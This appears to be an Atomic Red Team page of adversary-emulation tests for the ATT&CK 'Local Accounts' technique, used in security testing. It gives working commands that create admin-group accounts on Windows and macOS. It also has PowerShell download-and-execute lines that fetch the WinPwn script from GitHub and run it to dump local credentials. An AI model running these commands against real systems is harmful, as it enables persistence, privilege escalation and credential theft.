Try it using Invoke-Atomic

Valid Accounts: Local Accounts

Description from ATT&CK

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through OS Credential Dumping. Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.

Atomic Tests

Atomic Test #1 - Create local account with admin privileges

After execution the new account will be active and added to the Administrators group

Supported Platforms: windows

auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15

Inputs:

Name Description Type Default Value
password Password for art-test user String -4RTisCool!-321

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add

Cleanup Commands:

1
2
net localgroup administrators art-test /delete >nul 2>&1
net user art-test /delete >nul 2>&1

Atomic Test #2 - Create local account with admin privileges - MacOS

After execution the new account will be active and added to the Administrators group

Supported Platforms: macos

auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa

Inputs:

None

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
7
8
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser

Cleanup Commands:

1
sudo dscl . -delete /Users/AtomicUser

Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie

Loot local Credentials - powerhell kittie technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive

Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz

Loot local Credentials - Safetykatz technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive

source